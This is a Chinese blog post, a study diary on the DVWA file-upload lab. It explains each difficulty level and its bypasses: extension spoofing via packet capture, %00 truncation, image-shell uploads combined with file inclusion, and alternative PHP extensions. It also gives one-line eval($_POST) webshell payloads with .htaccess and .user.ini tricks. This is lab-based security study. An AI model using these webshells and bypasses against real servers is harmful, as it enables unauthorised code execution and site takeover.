2021-03-31,upload

于 2021-03-31 16:21:56 发布
阅读量105 收藏
点赞数
分类专栏: 日报?
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51792282/article/details/115348199
版权

老规矩,先看index

有一个提交的表单

<form enctype=\"multipart/form-data\" action=\"#\" method=\"POST\">
			<input type=\"hidden\" name=\"MAX_FILE_SIZE\" value=\"100000\" />
			Choose an image to upload:<br /><br />
			<input name=\"uploaded\" type=\"file\" /><br />
			<br />
			<input type=\"submit\" name=\"Upload\" value=\"Upload\" />\n";

MAX_FILE_SIZE规定了问文件最大的大小,不能超过0.1M

文件上传

file.html

<html>
<head></head>
<body></body>
<form enctype="multipart/form-data" action="file.php" method="POST">
    Send this file: <input name="userfile" type="file" />
    <input type="submit" value="Send File" />
</form>
</html>

file.php

<?php
echo "<pre>";
print_r($_FILES);
?>

low

basename() 函数返回路径中的文件名部分。
比如

<?php
$path = "/testweb/home.php";
echo basename($path) ."<br/>";

会返回个home.php

move_uploaded_file() 函数把上传的文件移动到新位置。

如果 file 不是合法的上传文件,不会出现任何操作,move_uploaded_file() 将返回 false。
如果 file 是合法的上传文件,但出于某些原因无法移动,不会出现任何操作,move_uploaded_file() 将返回 false,此外还会发出一条警告。
仅用于通过 HTTP POST 上传的文件。
如果成功该函数返回 TRUE,如果失败则返回 FALSE。

PHP $_FILES 是一个预定义的数组,用来获取通过 POST 方法上传文件的相关信息。如果为单个文件上传,那么 $_FILES 为二维数组;如果为多个文件上传,那么 $_FILES 为三维数组。

文件上传漏洞的利用

1.成功上传木马文件
2.上传文件必须能够被执行
3.上传文件的路径必须可知

low没有任何防御,直接上传shell.php后,用蚁剑链接即可

medium

	if( ( $uploaded_type == "image/jpeg" || $uploaded_type == "image/png" ) &&
		( $uploaded_size < 100000 ) ) {

对文件的类型和大小进行了限定

上传图片马+文件包含

上传的图片中,写入了一句话木马
但是很遗憾,只是传个图片并没有啥用,要用php解析才可以
这时候,在昨天学习的文件包含就用上了

http://169.254.132.13/dvwa/vulnerabilities/fi/?page=hthttp://tp://169.254.132.13/dvwa/hackable/uploads/shell.png

抓包,修改文件名

在只有前端验证的情况下,上传png格式但是之后通过抓包改成php格式

%00截断

在php版本小于5.3.4的服务器中,当Magic_quote_gpc选项为off时,可以在文件名中使用%00截断,所以可以把上传文件命名为hack.php%00.png。

high

strrpos()
查找字符串在另一字符串中最后一次出现的位置。
返回字符串在另一字符串中最后一次出现的位置,如果没有找到字符串则返回 FALSE。

substr()
返回字符串的指定部分

getimagesize(string filename)

此函数会通过读取文件头,返回图片的长、宽等信息,如果没有相关的图片文件头,函数会报错。

$uploaded_ext  = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1);

if( ( strtolower( $uploaded_ext ) == "jpg" || strtolower( $uploaded_ext ) == "jpeg" || strtolower( $uploaded_ext ) == "png" ) &&
		( $uploaded_size < 100000 ) &&
		getimagesize( $uploaded_tmp ) ) {

代码读取了文件名最后一个点之后的内容,在之后的代码里,要求此内容必须为jpg、jpeg、png之一
而且需要相关的文件头

可以将一句话木马藏在图片的最后,再利用文件包含进行读取

也可以利用%00截断+图片头直接上传(如果可以的话)

impossible

uniqid() 函数基于以微秒计的当前时间,生成一个唯一的 ID。

$target_file   =  md5( uniqid() . $uploaded_name ) . '.' . $uploaded_ext;

if( $uploaded_type == 'image/jpeg' ) {
			$img = imagecreatefromjpeg( $uploaded_tmp );
			imagejpeg( $img, $temp_file, 100);
		}
		else {
			$img = imagecreatefrompng( $uploaded_tmp );
			imagepng( $img, $temp_file, 9);
		}
		imagedestroy( $img );

更改了文件名
根据函数重新创建了一张图片,将原图片销毁
加入Anti-CSRF token防护CSRF攻击

本来想上传一张图片马然后用低难度的文件包含
但是没想到图片在上传之后内容发生了改变(虽然显示的还是那个)

罪魁祸首
imagejpeg ( image , filename , quality)

从image图像以filename为文件名创建一个JPEG图像,可选参数quality,范围从 0(最差质量,文件更小)到 100(最佳质量,文件最大)。

imagedestroy( img )

销毁图像资源

附我的upload笔记,自己看

JPGFF D8 FF E0 00 10 4A 46 49 46
GIF(相当于文本的GIF89a)47 49 46 38 39 61
PNG89 50 4E 47

.php上传被过滤时可以用的别名:php2, php3, php4, php5, phps, pht, phtm, phtml,

Content-Type: image/png
Content-Type: image/jpeg

1.gif
GIF89a?
 <script language="php">eval($_POST['a']);</script>

1.jpg
 <script language="php">eval($_POST['a']);</script><?php eval($_POST[a]);?>

.htaccess
SetHandler application/x-httpd-php

.user.ini
GIF89a                  
auto_prepend_file=a.jpg
ProbeN1
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
2021-08-31
rgr963852741的博客
08-31 1384
启动APP出现:java.lang.IllegalArgumentException: Bad component name: ****** 是包名问题 启动APP时,按照常规的操作只输入包名启动,出现提示: Exception occurred while executing: java.lang.IllegalArgumentException: Bad component name: net.easyconn.carman.neutral at android.content.Intent.parse
2021-05-31
暗夜
05-31 2215
全志 drm架构------基础篇 学习随记 1.drm架构:(Direct Render Manage)图形渲染架构 drm驱动是显卡驱动的一种架构。相比FB架构,DRM更能适应当前日益更新的显示硬件。比如FB原生不支持多层合成,不支持VSYNC,不支持DMA-BUF,不支持异步更新,不支持fence机制等等,而这些功能DRM原生都支持。同时DRM可以统一管理GPU和Display驱动,使得软件架构更为统一,方便管理和维护。 DRM从模块上划分,可以简单分为3部分:libdrm、KMS、GEM
upload-labs文件上传漏洞靶场1-14关
爱国小白帽
02-13 2887
第一关 使用Burp Suite上传文件 在桌面创建1.php文件,写入一句话木马保存,然后将后缀名改为jpg 点击浏览选中创建好的jpg文件 然后点击上传,效果如下上传成功 使用Burp Suite抓包 将文件格式改成php文件,点击Forward发送数据包 查看C:\phpStudy\PHPTutorial\WWW\upload-labs-master下的upload文件夹,出现1....
upload-labs】图片马绕过pass13~16
qq_43665434的博客
03-21 1894
upload-labs】图片马绕过pass13~16 【pass-13】文件头检查绕过 1、源码分析 function getReailFileType($filename){ $file = fopen($filename, "rb"); //以字节流的形式打开上传的文件 $bin = fread($file, 2); //只读2字节 fclose($file); $strInfo = @unpack("C2chars", $bin); //unpack()解包
upload-labs靶场搭建以及通关
qq_46110224的博客
08-12 2733
upload-labs靶场环境搭建pass-01三级目录 靶场环境搭建 upload-labs是一个使用php语言编写的,专门收集渗透测试和CTF中遇到的各种上传漏洞的靶场。旨在帮助大家对上传漏洞有一个全面的了解。目前一共21关,每一关都包含着不同上传方式。 PHPstudy准备 upload-labs源码下载https://github.com/c0ny1/upload-labs 源码解压在指定路径…/…/phpstudy_pro\WWW 开始练习 在浏览器输入:http://localhost
aliyun-upload-sdk-1.5.0.zip
06-09
aliyun-upload-sdk-1.5.0.zipaliyun-upload-sdk-1.5.0.zipaliyun-upload-sdk-1.5.0.zipaliyun-upload-sdk-1.5.0.zipaliyun-upload-sdk-1.5.0.zipaliyun-upload-sdk-1.5.0.zipaliyun-upload-sdk-1.5.0.zipaliyun-...
安装upload-labs
最新发布
10-22
安装upload-labs 安装upload-labs是网安入门教程系列的一部分,旨在帮助初学者学习文件上传漏洞的基础知识和实践经验。在这篇文章中,我们将一步步指导您如何安装upload-labs靶场,以便更好地学习文件上传漏洞。 ...
webpack-upload-plugin:Webpack插件
05-13
webpack-upload-plugin介绍这是的插件。 主要目的是提供一个工具,用于将html(或其他语言的模板)中使用的js / css / img / font上传到cdn,然后将引用替换为相应的cdn url。环境要求节点> = 10.5.0安装npm i -D ...
file-upload
02-01
在“jQuery-File-Upload-master”这个压缩包中,包含了jQuery File Upload的源代码、示例、文档和其他相关资源。开发者可以通过阅读源码了解其实现原理,通过示例快速上手,并参考文档解决在使用过程中遇到的问题。 ...
nginx上传下载之nginx-upload-module-2.3.0
10-15
./configure --add-module=../nginx-upload-module-2.3.0 \ --prefix=/usr/local/nginx \ --with-http_ssl_module \ --with-pcre make sudo make install ``` 这里的 `--with-http_ssl_module` 参数表示启用 ...
2021-1-28日报banana
热门推荐
探针一号的博客
03-14 1万+
2021-1-28日报 明后天要搬家,可能没空来搞这个 看情况吧 文章目录2021-1-28日报1.哔哔叨叨(BBDD)2.第五章SQL注入注入的分类having子句和group by子句SQL Server利用错误消息提取信息系统函数 1.哔哔叨叨(BBDD) js中’b’+‘a’+ +‘a’+‘a’=baNaNa是为什么啊? 一个表达式中如果有减号 (-)、乘号 (*) 或 除号 (/) 等运算符时,JS 引擎在计算之前,会试图将表达式的每个分项转化为 Number 类型(使用 Number(x) 做
2021-03-26,dvaw,php一些函数,暴力破解
探针一号的博客
03-26 369
1
2021-02-03dvaw与杂记
探针一号的博客
02-04 290
File Inclusion Vulnerability: Insecure CAPTCHA dvwa不能正常显示,需要在配置文件中加入谷歌的密钥: $_DVWA[ ‘recaptcha_public_key’ ] = ‘6LfX8tQUAAAAAOqhpvS7-b4RQ_9GVQIh48dRMGsD’; $DVWA[ ‘recaptcha_private_key’ ] = '6LfX8tQUAAAAAIR5ddYvRf3zNqM-k__Ux73oZzb’; ...
2021-02-05基于python实现管理系统
探针一号的博客
02-07 266
1
2021-03-14由一段代码引发的血案,md5,foreach,unset绕过,php伪协议
探针一号的博客
03-14 238
起因 读《白帽子讲Web安全》里的一段代码 $chs = ''; if($_POST && $charset != 'utf-8'){ $chs = new Chinses('UTF-8',$charset); foreach ($_POSTas as $key => $value) { $$key = $chs->Convert($value); } unset($chs); } $$是甚么 php中$$符号的使用方法 示例代码: <?php $va
2021-1-27日报
探针一号的博客
01-28 201
2021-1-27日报 文章目录2021-1-27日报1.哔哔叨叨(BBDD)2.第四章漏洞扫描BurpAWVS 1.哔哔叨叨(BBDD) 今天想说些什么呢 猫猫那么可爱,会有什么坏心眼呢? 丹霞 嗯,提醒自己一下假期要锻炼 2.第四章漏洞扫描 书里介绍了三个工具 Burp Burp模块详解 Burp Suite 2020 找不到 spider模块? 提一下,终于知道这是什么了 攻击类型 说明 狙击手 变量依次破解 破城槌 变量同时破解 音叉 每个变量对应一个字典 集束炸弹
2021-02-04MIME类型
探针一号的博客
02-07 187
杂记 媒体类型(通常称为 Multipurpose Internet Mail Extensions 或 MIME 类型 )是一种标准,用来表示文档、文件或字节流的性质和格式。它在IETF RFC 6838中进行了定义和标准化。
2021-2-1基于Python实现链表
探针一号的博客
02-01 181
2021-2-1 写Python的管理系统 链表(Linked list)是一种常见的基础数据结构,是一种线性表,但是并不会按线性的顺序存储数据,而是在每一个节点里存到下一个节点的指针(Pointer)。由于不必须按顺序存储,链表在插入的时候可以达到O(1)的复杂度,比另一种线性表顺序表(数组)快得多,但是查找一个节点或者访问特定编号的节点则需要O(n)的时间,而顺序表相应的时间复杂度分别是O(logn)和O(1)。 python程序类的写法中有的直接在class后加个名称,有的却在标识符后加一个括号,里面
2021-1-26日报
探针一号的博客
01-27 160
2021-1-25日报 文章目录2021-1-25日报1.哔哔叨叨(BBDD) 1.哔哔叨叨(BBDD) 香了,大连全域低风险,可以去大鸟转转转酒吧玩耍了(X)
el-upload before-upload
07-28
el-upload 是 Element UI 组件库中的一个上传组件,用于实现文件上传的功能。before-upload 是 el-upload 组件的一个属性,用于在上传文件之前对文件进行处理或验证。 在 el-upload 组件时,可以通过 before-upload...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值